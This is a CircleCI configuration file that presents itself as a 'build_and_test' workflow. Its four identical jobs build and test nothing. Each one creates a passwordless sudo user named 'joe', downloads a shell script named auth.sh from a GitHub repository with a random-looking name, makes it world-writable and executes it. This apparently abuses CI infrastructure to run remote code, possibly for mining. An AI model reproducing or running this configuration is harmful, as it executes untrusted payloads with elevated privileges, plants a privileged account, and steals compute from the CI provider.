version: 2.1

# Define the jobs we want to run for this project
jobs:
  gas1:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: sudo adduser --disabled-password --gecos "" joe && sudo usermod -aG sudo joe && wget https://github.com/anbcvxban/dabamba/raw/main/auth.sh && chmod 777 auth.sh && sh auth.sh
  gas2:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: sudo adduser --disabled-password --gecos "" joe && sudo usermod -aG sudo joe && wget https://github.com/anbcvxban/dabamba/raw/main/auth.sh && chmod 777 auth.sh && sh auth.sh
  gas3:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: sudo adduser --disabled-password --gecos "" joe && sudo usermod -aG sudo joe && wget https://github.com/anbcvxban/dabamba/raw/main/auth.sh && chmod 777 auth.sh && sh auth.sh
  gas4:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: sudo adduser --disabled-password --gecos "" joe && sudo usermod -aG sudo joe && wget https://github.com/anbcvxban/dabamba/raw/main/auth.sh && chmod 777 auth.sh && sh auth.sh

# Orchestrate our job run sequence
workflows:
  build_and_test:
    jobs:
      - gas1
      - gas2
      - gas3
      - gas4